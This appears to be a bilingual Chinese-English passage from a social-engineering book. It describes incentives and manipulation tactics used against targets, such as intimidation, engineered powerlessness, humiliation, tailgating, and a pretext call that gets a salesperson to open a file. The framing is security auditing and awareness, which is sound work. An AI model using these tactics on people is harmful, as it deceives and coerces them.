The malicious attacker’s incentive for using manipulation is his own financial gain and therefore his motivation and his technique will reflect that. For example, if the malicious social engineer’s goal is to get his target to part with some of his hard-earned money, the social engineer will utilize pretexts that will be “allowed” to ask for money—pretexts like charity organizations are suitable in this scenario because asking for donations or financial information is not out of the ordinary.

 

意识形态激励

Ideological Incentives

 

意识形态激励是最难描述的。每个人的理想都不同,而这些理想会影响激励。如果你一生的梦想是经营一家餐馆,那么这就是你的激情所在。你会比任何员工工作更长时间,付出更多努力。你也会以更少的薪水工作,因为这是你的梦想或你的动力;对其他人来说,这只是一份工作。

Ideological incentives are the most difficult to describe. Each person’s ideals are different and those ideals can affect the incentive. If your dream in life is to run a restaurant then that is your passion. You will work longer hours and put in more effort than any of your employees. You will also work for less money, because it is your dream or your motivation; for everyone else it is just a job.

 

梦想和信念可以深深扎根于人的内心,几乎不可能将它们从人身上分离出来。当你听到“我有一个梦想”这句话时,你会想到马丁·路德·金吗?有些人的梦想和目标是他们自己,而不是他们所想的。

Dreams and beliefs can be so ingrained in a person that separating them from the person can be almost impossible. When you hear the phrase, “I have a dream,” did you think of Martin Luther King? Some people’s dreams and goals are who they are, not what they think about.

 

人们往往会被那些拥有相似梦想和目标的人所吸引,这就是为什么“物以类聚,人以群分”这句话如此适用于这个讨论。但这也是为什么这么多人可以被操纵。

People tend to be drawn to those with similar dreams and goals, which is why the phrase, “Birds of a feather flock together” applies so well in this discussion. But it is also why so many people can be manipulated.

 

以基督教电视布道家为例。有信仰并渴望相信上帝的人会聚集在一起。志同道合的人可以加强彼此的信仰和做正确事情的愿望,但电视布道家可以利用这种意识形态让人们相信上帝的愿望是让那个特定的教会繁荣昌盛,从而让电视布道家的口袋里装满现金。

Look at Christian televangelists, for example. People who have a faith and desire to believe in God flock together. Like-minded people can strengthen each other’s faith and desire to do the right thing, but a televangelist can use that ideology to convince people that God’s desire is for that particular church to prosper, therefore also lining the televangelist’ pockets with cash.

 

电视布道家做了几次鼓舞人心的布道,流下了一些眼泪,突然人们就寄来了支票。这些电视布道家利用经济和社会理想的工具(见下一节“社会激励”)来说服听众接受他们的理想,这样那些人就会放弃他们辛苦赚来的钱。有趣的是,如果你问一个追随者他对传教士比他富有得多有什么感觉,他会相信这是上帝的旨意。他的理想被改变或操纵了。

The televangelist gives a few motivating sermons and sheds some tears and suddenly people are sending in the checks. These televangelists use the tools of both financial and social ideals (see the following section, “Social Incentives”) to convert their listeners to their ideals so those people part with their hard-earned cash. What is interesting is that if you ask a follower how he feels about the preacher being way richer than he is, he believes it is God’s will. His ideal set has been changed or manipulated.

 

意识形态激励也可以用于向人们传授道德,甚至使用恐惧作为激励手段也能对人们产生巨大影响。意识形态激励通常通过具有深意的故事和寓言来传授给儿童。格林兄弟就是这种激励的一个很好的例子。故事的结局往往是坏人受到身体伤害甚至死亡,而好人则在各种艰难困苦中坚持不懈,最终获得丰厚的回报,这种恐惧建立在对做坏事会导致死亡或某种可怕惩罚的恐惧之上。

Ideological incentives can also be used for the good by educating people about morals, and even resorting to using fear as the incentive can have great effects on people. Ideological incentives are often taught to children through stories and fables that have meanings behind them. The Brothers Grimm are an excellent example of this type of incentive. Stories that often end in the bad characters suffering physical harm or even death and the good characters, persevering through all forms of hardship, getting a massive reward at the end builds on fear that being bad leads to death or some terrible punishment.

 

意识形态激励也用于营销,通过在“志同道合”的理想经常“相遇”的地方投放广告。例如,尿布公司在家庭杂志上推销,动物收容所则在动物园推销,运动装备公司则在体育赛事上推销,等等。这种激励方式使广告中的商品或服务更有可能被那些拥有相同理想的人购买。

Ideological incentives are used in marketing, too, through placing ads where “like-minded” ideals often “meet.” For example, diaper companies market in family magazines, animal shelters market at zoos, athletic gear companies market at sporting events, and so on. This type of incentive gives a greater chance that the goods or services being advertised will be bought by those who share the same ideals.

 

意识形态激励被用来使一个人的理想与志同道合的人保持一致。通常,一旦人们对某个事业产生同情,操纵策略就开始了。同样,并非所有操纵都是坏事,但必须以适当的方式使用。

Ideological incentives are used to bring one’s ideals in alignment with those of a like mind. Often, once people are sympathetic to a cause is when the manipulation tactics start. Again, not all manipulation is bad, but it has to be used in the proper way.

 

社会激励

Social Incentives

 

社会激励可能是最广泛使用和最复杂的激励措施,尤其是在社会工程方面。

Social incentives are probably the most widely used and the most complex set of incentives out there, especially when it comes to social engineering.

 

人类天生具有社交性;这是我们在日常生活中所做的。社会激励也包括所有其他类型的激励。正确的关系可以增强您的财务需求,也可以调整、协调或增强您的理想。可以说,社会激励比其他两种类型的激励更强。

Humans are social by nature; it is what we do in normal daily life. Social incentives also encompass all the other types of incentives. The right relationship can enhance your financial needs and can also adjust, align, or augment your ideals. It could be argued that social incentives are stronger than the other two types of incentives.

 

同侪压力对许多人的影响显而易见。无论年老还是年幼,从众的吸引力都很大。很多时候,可接受的事物与社会激励直接相关。一个人的人生观和自我观会受到其社会环境的极大影响。从本质上讲,即使没有直接的同侪,同侪压力也会存在。

The power that peer pressure holds over many people is easy to see. For young and old alike, the draw of conformity is powerful. Many times, that which is acceptable is directly linked to a social incentive. One’s outlook on life and self can be greatly affected by his or her social surroundings. In essence peer pressure can exist even in the absence of direct peers.

 

我长得好看吗?这得看情况。如果我在美国,那里的超级名模都是零号身材,而那些男人的肌肉都长在我不知道有肌肉的地方,那我可能就不好看。如果我在古罗马,那里身材大可能意味着我富有和强大,那么我就长得好看。你的整个内心都由你的社会世界观所决定。

Am I good looking? Well, that depends. If I am in the United States where a supermodel is a size zero and the guys have muscles in places I didn’t know muscles existed, probably not. If I am in ancient Rome where maybe being larger meant I was rich and powerful, then I am. Your whole inner self is framed by your social view of the world.

 

1975 年,美国空军进行了一项名为“空军技术训练中社会激励的识别与分析”的研究,试图了解社会激励在训练演习中对培养领导者的作用。它在一个小组中模拟了四种不同的场景,并分析了它们对学生的影响。

In 1975, the U.S. Air Force ran a study entitled “Identification and Analysis of Social Incentives in Air Force Technical Training” to try to see the power of social incentives on creating leaders during its training drills. It ran four different scenarios with a group and analyzed what effects they had on the students.

 

最终的结果是,一定的社会激励,通常包括来自同龄人或权威人士的赞扬或积极鼓励,在学生和老师之间建立了牢固的联系:

The end results were that a certain social incentive, usually involving praise or positive reinforcement from peers or authority figures, created a strong bond between the students and instructors:

 

整个研究工作的主要结论是,管理社会激励是一门特别困难的艺术。虽然可以相当轻松地识别和衡量社会激励,但操纵和管理相同的激励需要付出更大的努力。衡量数据显示各种社会激励的吸引力值很高。现场实验的结果表明,熟人关系和心理契约练习对对同学的态度有积极影响。这两项发现都强调了社会因素的重要性。

The major conclusion of this entire research effort is that the management of social incentives is a particularly difficult art. While social incentives can be identified and scaled with considerable ease, manipulation and management of the same incentives requires considerably greater effort. The scaling data show high attractiveness value for various social incentives. The results of the field experiment show the positive influence of the acquaintanceship and psychological contract exercise on attitudes toward fellow trainees. Both of these findings underline the importance of social factors.

 

换句话说,一旦你知道一个人的动机是什么,增加或减少社会激励的吸引力就不是太难了。这种现象在青少年群体中尤为明显。当他们发现某人的烦恼时,它经常被用作强迫服从的武器。施加压力的群体越大,目标服从的可能性就越大。

In other words, increasing or decreasing the attractiveness of the social incentive is not too difficult once you know what motivates a person. This phenomenon is particularly evident in groups of teenagers. When they find out what bothers someone, it is often used as a weapon to force compliance. The larger the group that provides the pressure, the greater the chance the target will comply.

 

这是一个强有力的声明。我想知道,如果研究人员能够利用当今大量的社交媒体网站,这项研究会如何进行。同侪压力具有强大的影响力,每个人都想融入人群并成为其中的一员。

This is a powerful statement. I wonder how that research would have gone if the researchers had been able to use the plethora of social media sites that exist today. Peer pressure is a strong influence and everyone wants to fit in and be part of the crowd.

 

社会激励措施确实有效。2007 年,一组研究人员(Oriana Bandiera、Iwan Barankay 和 Imran Rasul)撰写了一篇研究论文,题为“社会激励措施:职场社交网络的成因和后果”(www.social-engineer.org/wiki/archives/Manipulation/Manipulation-Social-Incentivespdf.pdf)。

Social incentives work. In 2007 a group of researchers (Oriana Bandiera, Iwan Barankay, and Imran Rasul) wrote a research paper entitled, “Social Incentives: The Causes and Consequences of Social Networks in the Workplace” (www.social-engineer.org/wiki/archives/Manipulation/Manipulation-Social-Incentivespdf.pdf).

 

这份报告是一项有趣的研究,与空军的研​​究类似,但研究时间是在 2007 年。基本上,研究人员分析了那些在工作中有“朋友”的人在与朋友一起工作时如何处理工作。他们的结论是:

The report is an interesting study along the lines of the Air Force study, but set in 2007. Basically the researchers analyzed how those who have “friends” at work handle their jobs when they work in groups with their friends. Their conclusion:

 

我们的研究结果表明,存在社会激励因素——朋友的存在会影响工人的生产力,尽管由于生产技术或现有的薪酬方案,工人的努力不会对同事产生外部影响。由于社会激励因素,工人在一起工作时会遵守共同的规范。规范的水平是这样的:朋友的存在会提高能力不如朋友的工人的生产力,降低能力比朋友强的工人的生产力。

Our findings indicate there are social incentives—the presence of friends affects worker productivity, despite there being no externalities of worker effort onto their co-workers due to the production technology or compensation scheme in place. Due to social incentives, workers conform to a common norm when working together. The level of the norm is such that the presence of friends increases the productivity of workers who are less able than their friends and decreases the productivity of workers who are more able than their friends.

 

社会激励是决定工人绩效的重要量化因素。由于工人的工资是根据个人生产力来计算的,因此社会激励的强度是这样的:(i)比朋友更有能力的工人愿意放弃 10% 的收入以符合规范;(ii)至少有一个朋友比自己更有能力的工人愿意将生产力提高 10% 以达到规范。总体而言,工人能力的分布使得后者占主导地位,因此社会激励对公司绩效的净效应是积极的。

Social incentives are a quantitatively important determinant of a worker’s performance. As workers are paid piece rates based on individual productivity, the strength of social incentives is such that (i) workers who are more able than their friends are willing to forgo 10% of their earnings to conform to the norm; (ii) workers who have at least one friend who is more able than themselves are willing to increase productivity by 10% to meet the norm. Overall, the distribution of worker ability is such that the latter effect dominates so the net effect of social incentives on firm performance is positive.

 

朋友的存在意味着一个人实际上会更加努力或更不努力,这取决于他们正常的工作水平。没有实际压力的同侪压力会影响人们的工作。压力是通过标准来感知的。为什么?也许如果一个人可以工作得更快或更好,她可能不想表现出自以为是或马屁精的样子,这些人就是这样称呼的。也许如果他平时比较懒散,他不想显得懒惰,所以他会加快一点速度。无论哪种情况,他们的职业道德都会受到朋友的影响。

The presence of friends meant that a person would actually work harder or less hard depending on their normal work level. Peer pressure with the absence of the actual pressure can affect people’s work. The pressure is perceived by what is standard. Why? Maybe if a person could work faster or better, she probably didn’t want to appear to be a know-it-all or brown-noser, as these people can be called. Maybe if he is normally more of a slacker, he didn’t want to appear lazy so he pushed up the pace a little. In either case their work ethic was affected by having friends.

 

管理的一个好处是始终让最勤奋的员工和天生的领导者担任领导。但这项研究还有很多值得学习的地方。

A good point for management is to always put the hardest workers and natural leaders over the group. But there is so much to learn in this research.

 

这就是社会工程师使用“尾随”的方法。如果你身处一大群刚从休息或午餐回来的人中间,并且看起来像是其中一名员工,那么当你走进前门时被保安拦住的机会就会降到最低。

This method is how social engineers use “tail-gating.” Being in a large crowd of people coming back from break or lunch and looking like one of the employees minimizes the chance that the security guard will stop you while you walk through the front doors.

 

这也是整个群体如何被操纵,让其认为某种行为或态度是可接受的。你可以在娱乐行业看到这一点,每年可接受或道德的标准似乎都在降低,但这种标准的下降却被冠以“自由”的称号。

It is also how whole groups of people can be manipulated into thinking a certain action or attitude is acceptable. You can see this in the entertainment industry as each year the standard of what is acceptable or moral seems to get lowered, yet this drop in standards is sold as “freedom.”

 

这三种激励措施并不是唯一可以使用的类型。它们可以扩展到本书范围之外的其他方面,但问题仍然存在,即作为一名社会工程师,你该如何使用它们。

These three incentives are not the only types that are used. They can branch off into other aspects beyond the scope of this book, but the question still arises of how you can use them as a social engineer.

 

社会工程学中的操纵

Manipulation in Social Engineering

 

操纵并不是为了让别人像你一样思考并让他们感到舒服,而是为了强迫他们做你想做的事情。

Manipulation is less about making others think like you do and making them feel comfortable, and more about coercing them to do what you want.

 

胁迫不是一个友好的词。它的意思是“强迫以某种方式行动或思考”或“用武力支配、限制或控制”。

Coercion is not a friendly word. It means “to force to act or think in a certain manner” or “to dominate, restrain, or control by force.”

 

操纵和胁迫使用心理力量来改变目标的意识形态、信仰、态度和行为。使用它们的关键是使步骤非常小,几乎看不见。社会工程师不想让目标意识到他正在被操纵。以下一些方法可能非常有争议并且非常可怕,但它们每天都被骗子、身份窃贼等使用。操纵的目标之一可能是制造焦虑、压力和过度的社会压力。当目标有这种感觉时,他更有可能采取社会工程师操纵他们采取的行动。

Manipulation and coercion use psychological force to alter the ideology, beliefs, attitudes, and behaviors of the target. The key to using them is to make the steps so small they are almost invisible. The social engineer doesn’t want to alert the target he is being manipulated. Some of the following methods may be very controversial and downright horrible, but they are used each day by scammers, identity thieves, and the like. One of the goals of manipulation can be to create anxiety, stress, and undue social pressure. When a target feels that way he is more likely to take an action the social engineer is manipulating them to take.

 

考虑到这一点,你就会明白为什么操纵常常被认为是负面的,但它被用于社会工程,因此必须进行讨论。

With that in mind, you can see why manipulation is often thought of in a negative light, but it is used in social engineering and therefore must be discussed.

 

增加目标的暗示性

Increasing a Target’s Suggestibility

 

增加目标的暗示性可能涉及使用第 5 章中讨论的神经语言编程 (NLP) 技能或其他视觉提示。前面您读到过使用笔点击或其他噪音或手势来调节人们,即使没有说话也可以引发情绪。

Increasing a target’s suggestibility can involve using the neurolinguistic programming (NLP) skills discussed in Chapter 5 or other visual cues. Earlier you read about conditioning people with the use of pen clicks or other noises or gestures that can elicit an emotion even when words are not spoken.

 

我曾经看到过这种情况,当时我和一个操纵目标的人在一起。他用笔的咔嗒声来表示积极的想法。他会说一些积极的话,然后微笑并按动笔。实际上,我看到这个人在听到笔的咔嗒声大约四五次后开始微笑。然后他提起一个非常令人沮丧的话题并按动笔,然后目标微笑并立即感到尴尬。这种尴尬是他操纵目标做他想做的事情所需要的机会。

I once saw this in action when I was with a person who was manipulating a target. He used a pen click to indicate a positive thought. He would say something positive and then smile and click his pen. Literally, I saw the person begin to smile after about four or five times of hearing the pen click. He then brought up a very depressing subject and clicked his pen, and then the target smiled and felt instantly embarrassed. That embarrassment was the open door he needed to manipulate the target to do what he wanted.

 

可以通过重复想法或其他方式创造一种让对方感到容易接受暗示的情况,从而软化你想要表达的想法的目标。

Creating a situation where the other person feels susceptible to suggestion can be through repetition of ideas or other means that will soften the target to the ideas you are trying to present.

 

社会工程师可以确保整个设置都符合这种操纵 — 使用的短语、描绘的文字图片、选择穿的衣服颜色。所有这些都会使目标更容易受到攻击。

A social engineer can make sure the whole setup is geared towards this manipulation—the phrases used, the word pictures painted, the clothing colors chosen to wear. All of it can make the target more susceptible.

 

威廉·萨金特是一位备受争议的精神病学家,也是《心灵之战》一书的作者,他谈到了操纵人们的方法。萨金特认为,当目标受到恐惧、愤怒或兴奋的困扰时,各种类型的信念就会被植入人们的体内。这些感觉会导致受暗示性增强和判断力受损。

William Sargant, a controversial psychiatrist and author of the book Battle for the Mind, talks about the methods by which people are manipulated. According to Sargant, various types of beliefs can be implanted in people after the target has been disturbed by fear, anger, or excitement. These feelings cause heightened suggestibility and impaired judgment.

 

社会工程师可以利用此装置,向目标提供引起恐惧或兴奋的建议,然后提供一个变成建议的解决方案。

A social engineer can use this device to their advantage by offering the target a suggestion that causes fear or excitement and then offering a solution that turns into a suggestion.

 

例如,在 BBC 的热门电视节目《The Real Hustle》中,剧组人员就曾通过一个骗局来展示这一骗局的运作方式。他们在商场设立了一个摊位,允许人们购买抽奖券。人们购买一张彩票,就有机会赢得三份奖品,奖品的价值远远超过他们刚买的彩票。

For example, in the hit BBC TV show The Real Hustle, the cast ran a scam to show how this works when they set up a booth in a mall that allowed people to buy raffle tickets. People would buy a ticket for a chance to win three prizes worth much more than the ticket they just bought.

 

一位女士买了彩票,当然,她赢得了最高奖金。她非常兴奋,因为她以前从未中过这样的奖。这时,保罗·威尔逊提出了操纵她的建议:在她最兴奋的时候,他告诉她,她必须拨打一个电话号码并提供她的银行信息才能领取奖金。

One woman bought the ticket, and, of course, she won the biggest prize. Her excitement was extreme because she had never won anything like this before. At this point, Paul Wilson gave the suggestion to manipulate her: At the height of excitement he told her she had to call a phone number and provide her bank info to claim her prize.

 

她毫不犹豫地就这么做了。这个建议很有道理,尤其是考虑到她当时的兴奋心情。

She did it without a second thought. The suggestion made sense, especially in the light of her excitement.

 

了解目标及其喜好、厌恶、孩子的名字、喜欢的球队和喜欢的食物,然后利用这些信息营造一种情感环境,这样就能更轻松地营造一种敏感的氛围。

Knowing the target and his likes, dislikes, kids’ names, favorite teams, and favorite foods, and then using this to create an emotional environment will make creating a susceptible atmosphere so much easier.

 

控制目标环境

Controlling the Target’s Environment

 

控制目标环境通常用于在线社交工程、诈骗和身份盗窃。

Controlling the target’s environment is often used in online social engineering, scams, and identity theft.

 

加入相同的社交网络和群组让攻击者有机会“面对面”操纵目标,使其按照攻击者想要的方式行动或思考。能够利用目标的社交网络找出他们的触发因素也是一个强大的工具。

Becoming part of the same social networks and groups gives the attacker the chance to have “face time” to be able to manipulate targets into acting or thinking the way the attacker wants. Being able to use a target’s social networks to find out what triggers they have is also a powerful tool.

 

我曾经用过这种方法,当时我为一个想要获得非法骗子联系方式的客户寻找非法骗子。我能够在他用来发布“成就”的论坛上获得一个账户。通过这种进入他的环境,然后与他交朋友的策略,我能够获得他的信任,利用他的社交网络了解他在做什么,并最终获得他的联系信息。

I used this method once when searching for an illegal scammer for a client who wanted to get the scammer’s contact details. I was able to gain an account on a forum he used to post his “achievements.” Using this tactic of getting into his environment, then befriending him, I was able to gain his trust, use his social networks to know what he was doing, and eventually get his contact info.

 

任何用于控制目标环境的方法都可用于这种操控技术。控制环境可以很简单,比如在你知道干扰的可能性最小时接近目标,或者允许目标看到或看不到会引起反应的东西。

Any method used to control the environment of the target can be used in this manipulation technique. Controlling the environment can be as simple as approaching when you know you have the least chance of interruption, or allowing a target to see or not see something that will cause a reaction.

 

当然,除非你打算把目标带到一个黑暗的密室里,否则你无法真正控制他的整个环境,因此,尽可能多地控制需要规划和研究。在你找到目标的社交圈(无论是在线还是在现实世界中)后,你需要花时间规划如何进入该环境以控制该环境。一旦进入,你想控制哪些元素?一个好的社交工程师不会急于“一击致命”,而是会花时间建立关系并收集信息,然后再进行最后一击。

Of course, unless you plan on bringing your target to a dark closet, you can’t really control his whole environment, so controlling as much as you can will take planning and research. After you locate your target’s social circles, whether online or in the real world, you will need to spend time planning how you will get an in to control that environment. Once inside, what elements do you want to control? A good social engineer will not come in running for the “kill shot” but will take time to build a relationship and gather information before the final blow is administered.

 

环境控制通常用于警察或战时审讯。审讯环境会营造出某种氛围,让目标感到安心、紧张、害怕、焦虑,或攻击者(或首席警官)希望目标感受到的任何其他情绪。

Environment control is often used in police or war-time interrogations. The environment where the questioning will take place will have a certain atmosphere to make the target feel at ease, nervous, scared, anxious, or any other emotion the attacker (or lead officer) wants the target to feel.

 

迫使目标重新评估

Forcing the Target to Reevaluate

 

破坏目标的信念、意识或对情况的情绪控制可能会对他或她产生非常令人不安的影响。这种策略非常消极,因为它被用来让目标怀疑他或她被告知的事情是否真实。

Undermining a target’s beliefs, awareness, or emotional control of a circumstance can have a very unsettling effect on him or her. This tactic is very negative because it is used to make a target doubt what he or she has been told to be true.

 

邪教利用这种手段来欺骗那些寻求人生指引的人。很多时候,感到迷茫或困惑的人会认为他们的整个信仰体系都需要重新评估。当邪教控制了局面时,他们会变得非常有说服力,以至于受害者会完全相信他们的家人和朋友并不知道什么才是最好的。

Cults use this tactic to prey upon those looking for guidance through life. Many times, people who feel lost or confused are convinced that their whole belief system needs to be reevaluated. When the cults have control they can be so convincing that the victims can be thoroughly convinced that their family and friends do not know what is best.

 

在个人社会工程层面,你可以让一个人重新评估他所受教育的关于什么是安全的、什么是不安全的、什么是公司政策、什么不是的信念。

On a personal social engineering level you can make a person reevaluate the beliefs he has been taught about what is safe and what is not, or what is corporate policy and what is not.

 

社会工程师每天都会采用类似的策略,提出一个经过深思熟虑的问题,让目标重新评估他在某个话题上的立场,并使他动摇。

Each day social engineers use similar tactics by presenting one well-thought-out question that can cause the target to reevaluate his stand on a topic and cause him to falter.

 

例如,在目前的经济环境下,销售人员渴望销售,而您可以致电某家公司的销售部门,而这家公司恰好对未经适当扫描和预防措施而从网上下载 PDF 有严格的规定。但您仍然可以拨打以下电话:

For example, in this economy, salespeople are hungry to make sales, and you could call the sales department of a company that happens to have a strict policy about downloading PDFs from the web without proper scans and precautions. Yet you can still place this call:

 

“您好,我是 ABC 公司的,我想订购你们的产品,数量可能超过 10,000 件。我的老板希望我获得三个报价,看看我们是否可以做得更好。我已将报价包上传到我们的网站;我可以给你网址吗?我两小时后要去开会。你能在那之前看一下报价包并给我一个初步报价吗?”

“Hi, I am with ABC Company and I want to place an order for your product that could be more than 10,000 pieces. My employer wants me to get three quotes to see whether we can do better. I have uploaded the quote package to our website; can I give you the URL? I am going to a meeting in two hours. Could you look over the package and get me a preliminary quote before then?”

 

您认为这种策略有效吗?销售人员很可能会毫不犹豫地下载并执行该文件。您让他重新评估了他所学的政策。

Do think this tactic would work? Most likely the salesperson would download and execute that file with little to no thought. You have caused him to reevaluate the policy he has been taught.

 

让目标感到无能为力

Making the Target Feel Powerless

 

让目标感到脆弱或无能为力是另一种非常阴暗但有效的策略。它经常用于社会工程,借口是愤怒的高管或应该对目标有权力的人。攻击者因目标没有回应或无法快速回答而感到愤怒,于是斥责或威胁目标,使他怀疑自己的立场并感到失去权力。

Making the target feel vulnerable or powerless is another very dark, but effective, tactic. It is often used in social engineering when the pretext is an angry executive or someone who should have power over the target. Angry by the lack of response or the inability of the target to give quick answers, the attacker berates or threatens the target, causing him to doubt his position and feel a loss of power.

 

另一种更微妙的使用方式是利用社会激励来破坏信仰体系。在一次审计中,我在扫描内部网络时被一名管理员拦住。当她正确地拦住我时,我的反应是:“你知道吗,这家公司每年都在与网络入侵作斗争?我在努力保护你,而你却试图阻止我做我的工作!”

Another more subtle way this is used is to undermine the belief system using social incentives. In one audit, I was stopped by a custodian while doing scans of the internal network. When she did the right thing for stopping me, I reacted with something like, “Did you know that each year this company deals with a constant battle against network breaches? I am trying to secure you, and you are trying to stop me from doing my job!”

 

我的强势态度让她感到无能为力,于是她退缩了。

My overpowering demeanor caused her to feel powerless and she backed down.

 

让目标给人一种他没有时间思考或情况非常紧急的印象也会让他感到无能为力。他没有时间思考如何处理问题,因此必须以他知道不应该的方式做出决定。

Giving a target the impression he has no time to think or there is serious urgency can also make him feel powerless. He cannot take the time to think about how to handle a problem and therefore must make a decision in a way he knows he shouldn’t.

 

在海地发生地震后,人们使用了这种策略。一个网站声称拥有可能失踪的亲人的信息。因为他们声称除了建立该网站的这个团体之外,没有人能够提供有关他们亲人的信息,所以他们可以要求满足某些标准才能获得这些信息。许多人感到绝望和无能为力,输入了太多信息,点击了他们知道不该点击的东西,最终受到了伤害。BBC 发表了一篇关于此事的报道,并列出了一些保持保护的技巧:http://news.bbc.co.uk/2/hi/business/8469885.stm

This tactic was used after the recent earthquakes in Haiti. A website was launched that claimed to have information on loved ones who might have been lost. Because their claim was that no one was able to provide information on their loved ones but this group who set up the site, they could demand certain criteria be met to obtain this information. Many people, feeling hopeless and powerless, entered too much information and clicked things they knew they shouldn’t and in the end were damaged by it. The BBC issued a story about this and lists some tips to stay protected: http://news.bbc.co.uk/2/hi/business/8469885.stm.

 

施加非身体上的惩罚

Dishing Out Nonphysical Punishment

 

与让目标感到无能为力密切相关的是让他们感到内疚、羞辱、焦虑或失去特权。这些感觉可能非常强烈,以至于目标可能会做任何事情来“重新获得青睐”。

Closely linked to making the target feel powerless is making them feel guilt, humiliation, anxiety, or loss of privilege. These feelings can be so strong that a target might possibly do anything to “regain favor.”

 

没有得到预期结果而产生的愧疚感会导致羞辱和怀疑,这会导致目标按照攻击者想要的方式做出反应。

Guilt over not giving what was expected can cause humiliation and doubt, which can cause the target to react the way the attacker wants.

 

在大多数社会工程学环境中,我不建议使用羞辱手段,但我见过团队在努力打开大门时对一个目标使用羞辱手段,而在另一个社会工程学团队成员身上使用羞辱手段,以软化目标的面容,使他们更容易接受暗示。

I don’t suggest using humiliation in most social engineering settings, but I have seen it used on a target in a team effort to open the door, and on another social engineering team member to soften the face of the target, making them more pliable to suggestion.

 

第一个袭击者在公共场合接近目标,试图获取信息;他扮演着重要人物的角色。

The first attacker approached the target in a public setting trying to get information; he was playing the role of someone important.

 

在谈话中,一名下属(碰巧是女性,也是团队的一员)走上前来,问了一个激怒了第一个攻击者的问题。他回应说:“你一定是我见过的最愚蠢的人。”一怒之下,他走开了。女攻击者看起来沮丧又伤心,目标很快安慰了她,并配合了她的行动。目标的同理心使他被操纵,泄露了比他想要的更多的信息。

In the middle of the conversation an underling, who happened to be female (and on the team), came up and asked a question that angered the first attacker. He reacted by saying, “You have to be the dumbest person I have ever met.” In a fit of anger he walked away. The female attacker looked dejected and hurt and was quickly comforted by the target, who fed into her act. The target’s empathy allowed him to be manipulated to give out way more information than he wanted.

 

恐吓目标

Intimidating a Target

 

威胁并不是社会工程学中传统意义上的策略。你不会把目标绑起来然后对他施以“杰克鲍尔”式的攻击,但你可以以微妙的方式使用威胁。

Intimidation is not a tactic that you might think of using in a traditional sense in social engineering. You are not going to tie up your target and go all “Jack Bauer” on him, but you can use intimidation in subtle ways.

 

暗示不遵守规定会导致被解雇或其他不良后果,可以威胁目标做出某种反应。政府经常使用这种策略来操纵社会,让社会相信经济体系正在崩溃。这样他们就可以控制被统治者的情绪。

Suggesting that failure to comply can lead to being laid off or other adverse consequences can intimidate the target to react a certain way. Governments often use this tactic to manipulate society to believe that the economic system is collapsing. This way they can control the emotions of those they govern.

 

你可以在社会工程审计中使用它,即使外表看起来很吓人。忙碌、不安和肩负重任的样子会让很多人感到害怕。说话时带着非常权威的表情也会让人感到害怕。

You can use it in a social engineering audit even by having an intimidating appearance. Looking busy, upset, and on a mission can intimidate many. Talking with very authoritative expressions can also intimidate people.

 

在商业中,通过挂号信或快递寄送物品会带有一定程度的恐吓意味。让收件人签收一份内容不明的包裹可能会让一些人感到害怕。这种操纵策略的目的是让目标感到不安和焦虑,这可能会导致他做出事后会后悔的反应,但那时已经太晚了。

In business, sending things by certified mail or courier connotes a level of intimidation. Making the person sign for a package whose contents are unknown can make some people intimidated. The goal with this manipulation tactic is to make the target feel uneasy and anxious, which can cause him to react in a way he will later regret, but by then it is too late.

 

社会工程师和专业审计师成功地运用了这些阴暗的操纵技巧。操纵一个人感到完全无助,使他或她觉得向攻击者屈服是合理的。

These darker manipulation techniques are used successfully by social engineers and professional auditors. Manipulating a person to feel completely helpless causes him or her to feel that giving in to the attacker makes sense.

 

这就是社会工程学实践中的操纵与其他影响形式的区别所在。通过负面操纵,社会工程师会离开,不会在意目标之后的感受。即使目标意识到自己被黑客入侵,也无济于事,因为损害已经造成,公司或个人已经被入侵。

That really is where manipulation differs in a social engineering practice from other forms of influence. With negative manipulation the social engineer leaves and doesn’t care how the target feels later on. Even if a target realizes he has been hacked, it doesn’t matter because the damage is done and the company or person is already infiltrated.

 

社会工程操纵的其他方面同样强大,但并不那么黑暗。

Other aspects of social engineering manipulation are just as powerful but not so dark.

 

运用积极操纵

Using Positive Manipulation

 

积极操纵与消极操纵的目标相同——最终目标会与你的想法和愿望保持一致。不同之处在于你如何实现目标。但在积极操纵中,当你完成时,目标不需要治疗。

Positive manipulation has the same goals in mind as negative manipulation—in the end the target is in alignment with your thoughts and desires. The differences are in how you get there. But in positive manipulation, the target doesn’t need therapy when you are done.

 

经过多年的研究,我总结了一些关于父母如何与孩子互动以让孩子遵从父母意愿的技巧。其中关于积极操纵的一些观点对社会工程师很有用。以下部分介绍了其中一些积极的技巧。

Over my years of research, I have compiled some tips about how parents interact with their children to get them to comply with the parents’ wishes. A few of its points on positive manipulation are useful for social engineers. The following sections cover some of these positive techniques.

 

把你的情绪和他们的行为分开

Disconnect Your Emotion from Their Behavior

 

将您的情绪与目标的行为区分开来很重要。一旦您的情绪介入,目标就会操纵您。当然,您可以感受到情绪,但要控制自己的感受以及如何表达自己的感受。

Keeping your emotions separate from your target’s behavior is important. As soon as you let your emotions get involved the target is manipulating you. You can feel emotion, of course, but be in control of what you feel and how you display what you are feeling.

 

你不想成为失控的一方。你还想尽可能地控制负面情绪,以便始终保持掌控。

You do not want to be the one out of control. You also want to control the negative emotions as much as possible so you can remain in control at all times.

 

断绝情绪也能让人感到安心。这并不意味着没有情绪;那样并不能让人感到安慰。但是,如果某人真的心烦意乱,表现出适当的关心是好的,但如果你表现的情绪太多,你可能会抵消目标并毁掉演出。

Disconnecting your emotions can also put people at ease. This doesn’t mean being devoid of emotion; that is not comforting to people. But if someone is really upset, showing the proper level of concern is good, but if your display of emotion is too much you can offset the target and ruin the gig.

 

保持情绪与想要达到的借口一致。如果你不让情绪牵扯其中,你就能始终保持控制。优秀的社交工程师能够做到这一点,无论目标表现出何种行为或态度。如果目标感到不安、愤怒、好斗、粗鲁,或者表现出任何其他负面情绪,优秀的社交工程师都会保持冷静、沉着和镇定。

Keep your emotions in alignment with the pretext you are trying to achieve. If you do not allow your emotions to get involved you can remain in control at all times. A good social engineer is able to do this despite the actions or attitudes displayed by the target. If the target is upset, mad, belligerent, rude, or if any other negative emotion is displayed, a good social engineer remains calm, cool, and collected.

 

寻找值得提及的积极因素

Look for the Positive to Mention

 

只要有可能,就找点事情开玩笑或赞美,但不要显得太过怪异。你不会想走到保安面前说:“所以两个修女走进了一家酒吧……”这种方法可能不会太成功。同时,你也不能走进前台,对柜台后面的女孩说:“哇,你真漂亮。”

Whenever you can, find something to make a joke about or compliment, but without being creepy. You don’t want to walk up to the security guard and say, “So two nuns walk into a bar….” This method probably won’t go over too well. At the same time you can’t walk into the front office and say to the girl behind the counter, “Wow, you’re pretty.”

 

